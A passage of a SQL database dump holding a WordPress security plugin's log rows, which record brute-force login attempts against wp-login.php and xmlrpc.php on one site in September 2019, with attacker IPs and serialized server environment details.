11:14:32',17742656,19233440,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2'),(25040,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"38096\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIRmkQGijxhVPhG1M0zOAAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568805278.0272\";s:12:\"REQUEST_TIME\";s:10:\"1568805278\";}}','notice','2019-09-18 11:14:44','2019-09-18 11:14:43',18256672,19555424,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(25041,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"62616\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYITLsrWzCkhZpjT3iN57gAAAUE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568805680.2359\";s:12:\"REQUEST_TIME\";s:10:\"1568805680\";}}','notice','2019-09-18 11:21:25','2019-09-18 11:21:24',17740056,19231056,'https://bintara.com.my/wp-login.php',1,0,'142.93.113.182'),(25042,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"64662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYITOMrWzCkhZpjT3iN58AAAAVY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568805693.9727\";s:12:\"REQUEST_TIME\";s:10:\"1568805693\";}}','notice','2019-09-18 11:21:35','2019-09-18 11:21:34',18262328,19559576,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.113.182'),(25043,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"51474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIUqyR0vdvYEIduPCLwzQAAARI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806060.2807\";s:12:\"REQUEST_TIME\";s:10:\"1568806060\";}}','notice','2019-09-18 11:27:41','2019-09-18 11:27:40',17743080,19234520,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(25044,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"51906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIUr8rWzCkhZpjT3iN7bgAAAUY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806066.4198\";s:12:\"REQUEST_TIME\";s:10:\"1568806066\";}}','notice','2019-09-18 11:27:47','2019-09-18 11:27:46',18258296,19556248,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(25045,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.6.175\";s:11:\"REMOTE_PORT\";s:5:\"35320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIVSTYpjlmVadK6PeGoGgAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806217.5565\";s:12:\"REQUEST_TIME\";s:10:\"1568806217\";}}','notice','2019-09-18 11:30:18','2019-09-18 11:30:17',17739840,19230936,'https://bintara.com.my/wp-login.php',1,0,'142.4.6.175'),(25046,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.6.175\";s:11:\"REMOTE_PORT\";s:5:\"36358\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIVWDYpjlmVadK6PeGoHAAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806232.9032\";s:12:\"REQUEST_TIME\";s:10:\"1568806232\";}}','notice','2019-09-18 11:30:34','2019-09-18 11:30:33',18256920,19553800,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.6.175'),(25047,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"64363\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIWN8rWzCkhZpjT3iN9VwAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806455.1663\";s:12:\"REQUEST_TIME\";s:10:\"1568806455\";}}','notice','2019-09-18 11:34:16','2019-09-18 11:34:15',17740952,19232040,'https://bintara.com.my/wp-login.php',1,0,'178.62.9.122'),(25048,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"10354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIWOsrWzCkhZpjT3iN9XwAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806458.9838\";s:12:\"REQUEST_TIME\";s:10:\"1568806458\";}}','notice','2019-09-18 11:34:20','2019-09-18 